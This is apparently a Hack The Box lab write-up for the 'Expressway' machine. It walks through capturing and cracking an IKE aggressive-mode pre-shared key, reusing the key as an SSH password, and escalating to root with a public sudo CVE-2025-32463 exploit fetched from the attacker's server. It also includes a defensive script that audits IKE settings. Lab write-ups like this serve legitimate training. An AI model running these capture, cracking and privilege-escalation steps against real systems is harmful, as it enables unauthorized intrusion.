HTB Expressway writeup

TLDR

IKE (IPsec) aggressive mode leaked enough information to capture a hash derived from the pre-shared key; cracking it offline recovered a secret that was reused as the SSH password of a local user. An outdated sudo (1.9.17) then allowed privilege escalation to root with CVE-2025-32463.


Recon

The initial Nmap scan shows nothing useful on TCP apart from SSH, but a UDP scan reveals ISAKMP (IKE) on 500/udp.

Nmap scan report for 10.10.11.87
Host is up (0.025s latency).
Not shown: 65534 closed tcp ports (conn-refused)
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 10.0p2 Debian 8 (protocol 2.0)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel


UDP SCAN

PORT STATE SERVICE
500/udp open isakmp

After some research into enumerating IPsec (IKE), ike-scan gave us more information. IKEv1 aggressive mode should not be enabled: unlike main mode, it sends the peer identity in the clear and returns a hash derived from the pre-shared key before the peer has proven anything, so an unauthenticated client can capture material for an offline attack.

sudo ike-scan -M --aggressive 10.10.11.87
Starting ike-scan 1.9.5 with 1 hosts (http://www.nta-monitor.com/tools/ike-scan/)
10.10.11.87 Aggressive Mode Handshake returned
HDR=(CKY-R=5afad9b521ac2d5a)
SA=(Enc=3DES Hash=SHA1 Group=2:modp1024 Auth=PSK LifeType=Seconds LifeDuration=28800)
KeyExchange(128 bytes)
Nonce(32 bytes)
ID(Type=ID_USER_FQDN, Value=ike@expressway.htb)
VID=09002689dfd6b712 (XAUTH)
VID=afcad71368a1f1c96b8696fc77570100 (Dead Peer Detection v1.0)
Hash(20 bytes)

Ending ike-scan 1.9.5: 1 hosts scanned in 0.040 seconds (24.87 hosts/sec). 1 returned handshake; 0 returned notify

This scan shows that one of the proposed transforms was accepted and that the server is willing to complete an IKE negotiation with us.

The accepted transform uses 3DES for encryption, SHA-1 as the hash algorithm, and 1024-bit MODP (group 2) for Diffie-Hellman. All three are weak choices that should not be used today. Most importantly, the authentication method is PSK (pre-shared key).

We also get a valid group name (ID), "ike@expressway.htb". With an accepted transform, the group name, and aggressive mode allowed, we can obtain the hash of the PSK and crack it offline.
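As a defender-side check for the findings above, here is a small audit script added to this writeup (it is not part of the original post or of ike-scan): it parses the aggressive-mode handshake text that ike-scan prints and flags the settings a hardened IKE responder should refuse. The sample output is constructed from the scan shown above, and the WEAK_* policy sets are this example's own choices.

```python
"""Audit ike-scan aggressive-mode output for weak IKEv1 settings."""
import re

# Constructed sample: the relevant lines from the ike-scan output above.
SAMPLE = """\
10.10.11.87 Aggressive Mode Handshake returned
HDR=(CKY-R=5afad9b521ac2d5a)
SA=(Enc=3DES Hash=SHA1 Group=2:modp1024 Auth=PSK LifeType=Seconds LifeDuration=28800)
ID(Type=ID_USER_FQDN, Value=ike@expressway.htb)
"""

# Policy thresholds are this example's own choices, not an ike-scan feature.
WEAK_ENC = {"DES", "3DES"}
WEAK_HASH = {"MD5", "SHA1"}
WEAK_GROUPS = {"1:modp768", "2:modp1024", "5:modp1536"}


def parse_sa(output: str) -> dict:
    """Return the key=value attributes of the accepted SA=(...) transform."""
    m = re.search(r"SA=\((.*?)\)", output)
    if not m:
        return {}
    return dict(kv.split("=", 1) for kv in m.group(1).split())


def audit(output: str) -> list:
    """Return human-readable findings for one responder's ike-scan output."""
    findings = []
    if "Aggressive Mode Handshake returned" in output:
        findings.append("aggressive mode accepted: identity and PSK-derived hash "
                        "are handed to any unauthenticated peer")
    sa = parse_sa(output)
    if sa.get("Enc") in WEAK_ENC:
        findings.append(f"weak cipher {sa['Enc']}")
    if sa.get("Hash") in WEAK_HASH:
        findings.append(f"weak hash {sa['Hash']}")
    if sa.get("Group") in WEAK_GROUPS:
        findings.append(f"weak DH group {sa['Group']}")
    if sa.get("Auth") == "PSK":
        findings.append("PSK authentication: captured hash is offline-crackable")
    m = re.search(r"ID\(Type=(\w+), Value=([^)]+)\)", output)
    if m:
        findings.append(f"peer identity disclosed: {m.group(2)}")
    return findings


if __name__ == "__main__":
    for finding in audit(SAMPLE):
        print("-", finding)
```

Run against the stored output of a scheduled ike-scan of your own VPN gateways, an empty findings list is the expected result; anything else is a misconfiguration to fix.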


Initial access

Using the accepted transform and the group ID, we request an aggressive-mode handshake and save the returned PSK hash for cracking:

sudo ike-scan -M -A -n ike@expressway.htb --pskcrack=hash.txt 10.10.11.87

We then crack the saved hash with psk-crack:

psk-crack -d /usr/share/wordlists/rockyou.txt hash.txt

Starting psk-crack [ike-scan 1.9.5] (http://www.nta-monitor.com/tools/ike-scan/)
Running in dictionary cracking mode
key "freakingrockstarontheroad" matches SHA-1 hash 1366dc68a471575ea291f0fa4e7ff61407b5dfac
Ending psk-crack: 8045040 iterations in 13.778 seconds (583911.05 iterations/sec)

This recovers the pre-shared key "freakingrockstarontheroad".

The same secret is reused as the SSH password of the local user ike, so we can log in to the target over SSH as ike.

Privilege escalation

First, we serve linpeas from our machine with python -m http.server and fetch it on the target with curl.

linpeas reports little of interest beyond possible sudo vulnerabilities, which turn out to be false positives for CVE-2021-3156. Checking sudo manually, however, shows that it is outdated, running version 1.9.17.

Researching this version leads to CVE-2025-32463 and a public proof-of-concept (POC). We transfer the POC the same way with python -m http.server, make it executable with chmod +x, and run it to get a root shell.

chmod +x privesc.sh
./privesc.sh

Then we grab the root flag and exit.

Overall, this was a pretty fun box — fairly easy to get into after initial enumeration and research.